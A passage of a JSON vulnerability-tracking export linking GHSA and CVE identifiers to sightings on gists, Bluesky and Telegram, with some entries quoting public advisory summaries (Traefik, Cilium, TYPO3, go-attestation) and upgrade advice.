"4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9gf4-p8hr-52vq", "type": "seen", "source": "https://gist.github.com/sgInnora/1881b930d06973834faf1f59e2e2e2ac", "content": "", "creation_timestamp": "2026-04-02T07:35:25.000000Z"}, {"uuid": "d2107269-32a3-465e-a575-815206be8747", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-014", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/116335147847077250", "content": "", "creation_timestamp": "2026-04-02T12:38:04.730000Z"}, {"uuid": "16377847-67d9-4946-8fba-9b49f47acc71", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6qxf-7jx6-86fh", "type": "seen", "source": "https://bsky.app/profile/timb.me.uk/post/3mijzewh7atc2", "content": "", "creation_timestamp": "2026-04-02T20:13:40.540991Z"}, {"uuid": "6b5f5c76-ca2a-4b8d-895d-518e1f94a281", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vv7q-7jx5-f767", "type": "seen", "source": "https://bsky.app/profile/cyber-news-fi.bsky.social/post/3miknqzyvav22", "content": "", "creation_timestamp": "2026-04-03T02:18:18.887450Z"}, {"uuid": "a7c986a7-e10a-4091-9c9a-1428ab1fe7a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5rrm-6qmq-2364", "type": "seen", "source": "https://bsky.app/profile/cyber-news-fi.bsky.social/post/3miknqzyvft2x", "content": "", "creation_timestamp": "2026-04-03T02:18:18.384800Z"}, {"uuid": "7d7ee681-e5a9-4af6-aa33-d6bbc6c36bdc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-x8jc-jvqm-pm3f", "type": "seen", "source": "https://bsky.app/profile/cyber-news-fi.bsky.social/post/3miknqzydqa2u", "content": "", "creation_timestamp": "2026-04-03T02:18:17.004462Z"}, {"uuid": "c3a9fe39-4fd8-4f9d-8b7d-6e1b410b84cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qcc3-jqwp-5vh2", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3miknapgzvl22", "content": "", "creation_timestamp": "2026-04-03T02:09:12.655689Z"}, {"uuid": "f4c81d88-b1c6-4935-aa29-fcfd08d0fced", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-59j7-ghrg-fj52", "type": "seen", "source": "https://gist.github.com/konard/4794dc572b1590a95fb04c4bbec9c880", "content": "", "creation_timestamp": "2026-04-08T21:16:10.000000Z"}, {"uuid": "9e57d5fe-6810-493b-822a-671779e57728", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-59j7-ghrg-fj52", "type": "seen", "source": "https://gist.github.com/konard/c8e129fb419410891d8630adda2f804a", "content": "", "creation_timestamp": "2026-04-08T23:41:23.000000Z"}, {"uuid": "fc4ffa32-f1e5-4d1b-8fd0-b5474af7debb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-59j7-ghrg-fj52", "type": "seen", "source": "https://gist.github.com/konard/d59dad218b4b1b8d8f0cf3cc8570919d", "content": "", "creation_timestamp": "2026-04-08T23:39:37.000000Z"}, {"uuid": "e1a9d433-dcee-48cb-b8f9-31282abf21b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fw8c-xr5c-95f9", "type": "seen", "source": "https://gist.github.com/segfo/53fc0d35b128b1c9424cc47fe6fdb868", "content": "", "creation_timestamp": "2026-04-09T07:23:56.000000Z"}, {"uuid": "d7399653-c137-4a51-baa4-f2b5b6ddabca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-cc2q-qc34-jprg", "type": "seen", "source": "https://bsky.app/profile/magnusmanske.wikis.world.ap.brid.gy/post/3mj2hq7bnc7z2", "content": "", "creation_timestamp": "2026-04-09T09:13:05.792570Z"}, {"uuid": "30f9011f-1d0d-49ac-b6cb-db5083685908", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-42xw-2xvc-qx8m", "type": "seen", "source": "https://gist.github.com/podhmo/d72566411eddd2d13a2e11b9b06e9d7c", "content": "", "creation_timestamp": "2026-04-09T09:46:45.000000Z"}, {"uuid": "35215c0d-ab9b-415a-8574-b7869249368a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-cc2q-qc34-jprg", "type": "seen", "source": "https://bsky.app/profile/hnws.bsky.social/post/3mj2o4fda2u2l", "content": "", "creation_timestamp": "2026-04-09T11:07:13.421219Z"}, {"uuid": "b01477d2-2023-45d7-a50c-9b2213ef2cb6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jcc6-f9v6-f7jw", "type": "seen", "source": "https://bsky.app/profile/euvd-bot.bsky.social/post/3mj3bvhmgr32w", "content": "", "creation_timestamp": "2026-04-09T17:01:15.640229Z"}, {"uuid": "b4162bc9-6d98-4e1c-a460-0a54eb1698b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-99CG-575X-774P", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12648", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-0317\n\ud83d\udd25 CVSS Score: 4 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\ud83d\udd39 Description: An improper input validation vulnerability in go-attestation before 0.3.3 allows local users to provide a maliciously-formed Quote over no/some PCRs, causing AKPublic.Verify to succeed despite the inconsistency. Subsequent use of the same set of PCR values in Eventlog.Verify lacks the authentication performed by quote verification, meaning a local attacker could couple this vulnerability with a maliciously-crafted TCG log in Eventlog.Verify to spoof events in the TCG log, hence defeating remotely-attested measured-boot. We recommend upgrading to Version 0.4.0 or above.\n\ud83d\udccf Published: 2022-02-04T22:33:03.136Z\n\ud83d\udccf Modified: 2025-04-21T13:56:50.110Z\n\ud83d\udd17 References:\n1. https://github.com/google/go-attestation/security/advisories/GHSA-99cg-575x-774p", "creation_timestamp": "2025-04-21T14:02:02.000000Z"}, {"uuid": "6762dae2-0743-47b7-b39e-ac42cd5b3457", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-22C6-WCJM-QFJG", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12656", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2021-22572\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: On unix-like systems, the system temporary directory is shared between all users on that system. The root cause is File.createTempFile creates files in the the system temporary directory with world readable permissions. Any sensitive information written to theses files is visible to all other local users on unix-like systems. We recommend upgrading past commit https://github.com/google/data-transfer-project/pull/969\n\ud83d\udccf Published: 2022-03-29T15:05:19.000Z\n\ud83d\udccf Modified: 2025-04-21T13:54:59.936Z\n\ud83d\udd17 References:\n1. https://github.com/google/data-transfer-project/pull/969\n2. https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-22c6-wcjm-qfjg", "creation_timestamp": "2025-04-21T14:02:15.000000Z"}, {"uuid": "52b91632-b7de-47f1-b78f-b22d46aead4c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-C28G-VH7M-FM7V", "type": "seen", "source": "https://gist.github.com/alon710/c244e115fd2a6e7cad63c783e19fbfbe", "content": "", "creation_timestamp": "2026-04-29T21:40:29.000000Z"}, {"uuid": "0bbf0249-f9b3-4f94-9b96-ec74cbe9aca4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-GFG9-5357-HV4C", "type": "seen", "source": "https://gist.github.com/alon710/1e3da4086ac1749b49c9eaefe594197b", "content": "", "creation_timestamp": "2026-04-29T22:10:29.000000Z"}, {"uuid": "0ff07203-0f80-4735-9830-860a68775ce4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vjgj-42f6-7997", "type": "seen", "source": "https://gist.github.com/alon710/9ad465efb2dcc0bcfff6645d6617d88f", "content": "", "creation_timestamp": "2026-04-30T00:10:29.000000Z"}, {"uuid": "5cf1e8f0-de8d-47b3-b7f1-ea69045677d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-24F7-Q5HH-27HF", "type": "seen", "source": "Telegram/W5TN0cicaU2jBrJWqqNsq1vVFaP23IzBfdE6nX--xWy0x0g", "content": "", "creation_timestamp": "2026-01-02T18:52:14.000000Z"}, {"uuid": "b20cfb10-86c1-432a-87e1-47da11dddf85", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7FJX-657R-9R5H", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12654", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2021-22571\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: A local attacker could read files from some other users' SA360 reports stored in the /tmp folder during staging process before the files are loaded in BigQuery. We recommend upgrading to version 1.0.3 or above.\n\ud83d\udccf Published: 2022-03-18T11:05:11.000Z\n\ud83d\udccf Modified: 2025-04-21T13:55:18.219Z\n\ud83d\udd17 References:\n1. https://github.com/google/sa360-webquery-bigquery/pull/15\n2. https://github.com/google/sa360-webquery-bigquery/releases/tag/v1.0.3\n3. https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-7fjx-657r-9r5h", "creation_timestamp": "2025-04-21T14:02:13.000000Z"}, {"uuid": "cce2d405-fc94-4e37-8183-a0829b4cc879", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5VXX-C285-PCQ4", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12686", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32793\n\ud83d\udd25 CVSS Score: 4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N)\n\ud83d\udd39 Description: Cilium is a networking, observability, and security solution with an eBPF-based dataplane. Versions 1.15.0 to 1.15.15, 1.16.0 to 1.16.8, and 1.17.0 to 1.17.2, are vulnerable when using Wireguard transparent encryption in a Cilium cluster, packets that originate from a terminating endpoint can leave the source node without encryption due to a race condition in how traffic is processed by Cilium. This issue has been patched in versions 1.15.16, 1.16.9, and 1.17.3. There are no workarounds available for this issue.\n\ud83d\udccf Published: 2025-04-21T15:34:14.315Z\n\ud83d\udccf Modified: 2025-04-21T15:48:55.214Z\n\ud83d\udd17 References:\n1. https://github.com/cilium/cilium/security/advisories/GHSA-5vxx-c285-pcq4\n2. https://github.com/cilium/cilium/pull/38592", "creation_timestamp": "2025-04-21T16:02:51.000000Z"}, {"uuid": "5b28a480-d831-4ccf-9209-a7b7f2a336cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VFRF-VCJ7-WVR8", "type": "seen", "source": "Telegram/jO9dryZvE_S5E-_gtLxGYUB48gMevmZpZHBZ7ROvZGlwCxA", "content": "", "creation_timestamp": "2026-01-02T18:53:14.000000Z"}, {"uuid": "4502f52f-1cbb-41ea-b41c-b68067e903ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-84G5-X8J3-7235", "type": "seen", "source": "https://gist.github.com/alon710/d0c2f5b6ff617e695bcff5b32092abcc", "content": "", "creation_timestamp": "2026-04-30T01:40:29.000000Z"}, {"uuid": "ed6303eb-4f55-4e0f-b580-d33e095abce2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6v9c-7cg6-27q7", "type": "seen", "source": "https://gist.github.com/alon710/e87f10931158991f62fe5f3be1e4d663", "content": "", "creation_timestamp": "2026-04-30T02:10:29.000000Z"}, {"uuid": "05200227-ae6c-46d5-aefd-302cda951b6a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FQ56-HVG6-WVM5", "type": "seen", "source": "Telegram/jO9dryZvE_S5E-_gtLxGYUB48gMevmZpZHBZ7ROvZGlwCxA", "content": "", "creation_timestamp": "2026-01-02T18:53:14.000000Z"}, {"uuid": "d5f2ee9c-4695-4f18-8c3e-40b9cfa70319", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MGJ2-Q8WP-29RR", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12734", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-23502\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N)\n\ud83d\udd39 Description: TYPO3 is an open source PHP based web content management system. In versions prior to 10.4.33, 11.5.20, and 12.1.1, When users reset their password using the corresponding password recovery functionality, existing sessions for that particular user account were not revoked. This applied to both frontend user sessions and backend user sessions. This issue is patched in versions 10.4.33, 11.5.20, 12.1.1.\n\ud83d\udccf Published: 2022-12-14T07:34:21.327Z\n\ud83d\udccf Modified: 2025-04-21T18:47:37.345Z\n\ud83d\udd17 References:\n1. https://github.com/TYPO3/typo3/security/advisories/GHSA-mgj2-q8wp-29rr", "creation_timestamp": "2025-04-21T19:02:14.000000Z"}, {"uuid": "b56d5e73-c081-41a7-b309-8f3f283d8671", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6P68-W45G-48J7", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12685", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32431\n\ud83d\udd25 CVSS Score: 8.8 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P)\n\ud83d\udd39 Description: Traefik (pronounced traffic) is an HTTP reverse proxy and load balancer. In versions prior to 2.11.24, 3.3.6, and 3.4.0-rc2. There is a potential vulnerability in Traefik managing the requests using a PathPrefix, Path or PathRegex matcher. When Traefik is configured to route the requests to a backend using a matcher based on the path, if the URL contains a /../ in its path, it\u2019s possible to target a backend, exposed using another router, by-passing the middlewares chain. This issue has been patched in versions 2.11.24, 3.3.6, and 3.4.0-rc2. A workaround involves adding a `PathRegexp` rule to the matcher to prevent matching a route with a `/../` in the path.\n\ud83d\udccf Published: 2025-04-21T15:34:04.637Z\n\ud83d\udccf Modified: 2025-04-21T15:55:15.087Z\n\ud83d\udd17 References:\n1. https://github.com/traefik/traefik/security/advisories/GHSA-6p68-w45g-48j7\n2. https://github.com/traefik/traefik/pull/11684\n3. https://github.com/traefik/traefik/releases/tag/v2.11.24\n4. https://github.com/traefik/traefik/releases/tag/v3.3.6\n5. https://github.com/traefik/traefik/releases/tag/v3.4.0-rc2", "creation_timestamp": "2025-04-21T16:02:50.000000Z"}, {"uuid": "8cf8d0fe-b27b-42f3-a509-6af0d81cada9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GM2P-WF5C-W3PJ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12688", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-3857\n\ud83d\udd25 CVSS Score: 8.7 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: When reading binary Ion data through Amazon.IonDotnet using the RawBinaryReader class, Amazon.IonDotnet does not check the number of bytes read from the underlying stream while deserializing the binary format. If the Ion data is malformed or truncated, this triggers an infinite loop condition that could potentially result in a denial of service. Users should upgrade to Amazon.IonDotnet version 1.3.1 and ensure any forked or derivative code is patched to incorporate the new fixes.\n\ud83d\udccf Published: 2025-04-21T15:13:51.905Z\n\ud83d\udccf Modified: 2025-04-21T15:41:48.859Z\n\ud83d\udd17 References:\n1. https://aws.amazon.com/security/security-bulletins/AWS-2025-009/\n2. https://github.com/amazon-ion/ion-dotnet/security/advisories/GHSA-gm2p-wf5c-w3pj", "creation_timestamp": "2025-04-21T16:02:52.000000Z"}, {"uuid": "1d505a4d-554c-41de-abe0-1aa14471bf31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7X3Q-G6GQ-F4MM", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14708", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-47245\n\ud83d\udd25 CVSS Score: 8.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: In BlueWave Checkmate through 2.0.2 before d4a6072, an invite request can be modified to specify a privileged role.\n\ud83d\udccf Published: 2025-05-03T00:00:00.000Z\n\ud83d\udccf Modified: 2025-05-03T23:10:27.114Z\n\ud83d\udd17 References:\n1. https://github.com/bluewave-labs/Checkmate/pull/2160\n2. https://github.com/bluewave-labs/Checkmate/security/advisories/GHSA-7x3q-g6gq-f4mm\n3. https://github.com/bluewave-labs/Checkmate/commit/d4a60723f490502b3fe6f7f780a85d29bf5d1385", "creation_timestamp": "2025-05-03T23:18:16.000000Z"}, {"uuid": "31e7686a-fc15-4d53-ae61-f1c1ba026903", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-93JC-VQQC-VVVH", "type": "published-proof-of-concept", "source": "Telegram/y2-H_SAe3hVK2HXhNkMWkTOSOUWTyek7fe8J5U8wlfTOwBA", "content": "", "creation_timestamp": "2026-01-02T21:55:06.000000Z"}, {"uuid": "c66ab59f-3db9-49ba-86e6-5b2482b39f46", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FQ56-HVG6-WVM5", "type": "published-proof-of-concept", "source": "Telegram/y2-H_SAe3hVK2HXhNkMWkTOSOUWTyek7fe8J5U8wlfTOwBA", "content": "", "creation_timestamp": "2026-01-02T21:55:06.000000Z"}, {"uuid": "a79980e8-3056-4803-90b2-3a2b381e53db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0001", "type": "published-proof-of-concept", "source": "Telegram/tnSVeYZoZ7XD_XZtoAg8da9hyH6297qKNo6VluCdDLGMBhU", "content": "", "creation_timestamp": "2026-01-05T05:01:22.000000Z"}, {"uuid": "d5a85ea0-a4f5-4661-bb40-acbc12f16765", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J5VV-P2HV-C392", "type": "seen", "source": "Telegram/1KywSS9pNEst0ZUnOIrrMzmR_FjI63qMIXr1OzeZh2tlqF4", "content": "", "creation_timestamp": "2026-01-06T05:03:39.000000Z"}, {"uuid": "a4e7f4f8-3a40-4977-ae49-cf6228b89f3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XQ7X-9524-F7CP", "type": "seen", "source": "Telegram/1KywSS9pNEst0ZUnOIrrMzmR_FjI63qMIXr1OzeZh2tlqF4", "content": "", "creation_timestamp": "2026-01-06T05:03:39.000000Z"}, {"uuid": "5886137d-1ee0-4390-9f52-3c380849a732", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-95W5-JVQF-3994", "type": "seen", "source": "Telegram/1KywSS9pNEst0ZUnOIrrMzmR_FjI63qMIXr1OzeZh2tlqF4", "content": "", "creation_timestamp": "2026-01-06T05:03:39.000000Z"}, {"uuid": "60989c48-c8de-4514-a42b-28040ddd7f41", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R8W6-9XWG-6H73", "type": "published-proof-of-concept", "source": "Telegram/shQsG5TFmMrzus3uWOqA-vjUO4oHdrJHZ6Xu7ifps-_tm5s", "content": "", "creation_timestamp": "2026-01-07T20:04:13.000000Z"}, {"uuid": "cffeab8d-5b90-4ea5-97bb-5ced6974a2ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H956-RH7X-PPGJ", "type": "seen", "source": "Telegram/FAHiP5CCenWu92dxIOQ4FEFDti8EunWIiYzRLGxROm4Tk2w", "content": "", "creation_timestamp": "2026-01-05T16:05:40.000000Z"}, {"uuid": "86f2e762-263c-4db0-9d3d-ef5982cface8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9952-gv64-x94c", "type": "seen", "source": "https://gist.github.com/alon710/fa6f3429cdb0ca10a7774d13cabd77e1", "content": "", "creation_timestamp": "2026-02-27T15:20:18.000000Z"}, {"uuid": "0eefc7fd-66e9-4bda-b16e-47fc56ea86fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-r492-hjgh-c9gw", "type": "seen", "source": "https://gist.github.com/alon710/e1ec4d28426e93e5bbac8a63052d7481", "content": "", "creation_timestamp": "2026-02-27T16:40:11.000000Z"}, {"uuid": "3c435760-1697-4143-9907-1884acec36b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-phwh-4f42-gwf3", "type": "seen", "source": "https://gist.github.com/alon710/6f62f3e47b65ada36a43c642ee722b2f", "content": "", "creation_timestamp": "2026-02-27T21:10:11.000000Z"}, {"uuid": "a2a0c6a9-f8bc-4e6a-a277-e62407d3c5ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-prjf-86w9-mfqv", "type": "seen", "source": "https://gist.github.com/alon710/b3ea10b84b3ec49955d7221d8d85c2f7", "content": "", "creation_timestamp": "2026-02-27T20:10:11.000000Z"}, {"uuid": "815db2d3-f627-42c1-afd5-a466d4ec12cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-282g-fhmx-xf54", "type": "seen", "source": "https://gist.github.com/alon710/b80b546288fad3926bdbc67b49b19ff1", "content": "", "creation_timestamp": "2026-02-27T21:40:11.000000Z"}, {"uuid": "5adbc17a-7edf-4d8b-bb0c-c8a18c3494f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-j273-m5qq-6825", "type": "seen", "source": "https://gist.github.com/alon710/322eaec6115140d27bccb17e1450bfcd", "content": "", "creation_timestamp": "2026-02-27T22:40:11.000000Z"}, {"uuid": "0b9b6024-79dd-4eac-af3a-4f8bb2c0856e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7JX5-9FJG-HP4M", "type": "seen", "source": "https://gist.github.com/alon710/0dcef91400c9361c9eb058c2c8a6df3b", "content": "", "creation_timestamp": "2026-02-27T23:10:11.000000Z"}, {"uuid": "223bcc08-ed58-4ac5-9087-a67ad5e446d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-82G8-464F-2MV7", "type": "seen", "source": "https://gist.github.com/alon710/124aa62e68165700979af9dde34a518f", "content": "", "creation_timestamp": "2026-02-27T23:40:11.000000Z"}, {"uuid": "4698ed78-dbd8-4ea8-ae18-523a5027489d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rw9x-pxqx-q789", "type": "seen", "source": "https://gist.github.com/alon710/ec22814fdc2305d798b5b3216cff5a34", "content": "", "creation_timestamp": "2026-02-28T00:10:11.000000Z"}, {"uuid": "6fd91f6e-1741-4001-b8c4-8b28a4943760", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7777-fhq9-592v", "type": "seen", "source": "https://gist.github.com/alon710/cc79fb84eb7e27eda5e00b377415b26c", "content": "", "creation_timestamp": "2026-02-28T00:40:10.000000Z"}, {"uuid": "07235503-b0a4-4f12-9e8d-dbd79edf1441", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6mq3-xmgp-pjm5", "type": "seen", "source": "https://gist.github.com/alon710/26ad557fbd4646a04459f43b9aa9e194", "content": "", "creation_timestamp": "2026-02-28T01:10:11.000000Z"}, {"uuid": "38929b8f-bb7e-43a0-8864-f677d0fea27d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w22q-m2fm-x9f4", "type": "seen", "source": "https://gist.github.com/alon710/ddf713b6949e1e0ad41c8c6c2f71cccf", "content": "", "creation_timestamp": "2026-02-28T01:40:11.000000Z"}, {"uuid": "34e72a9f-358f-4d54-afcc-0081e8a3bfef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": 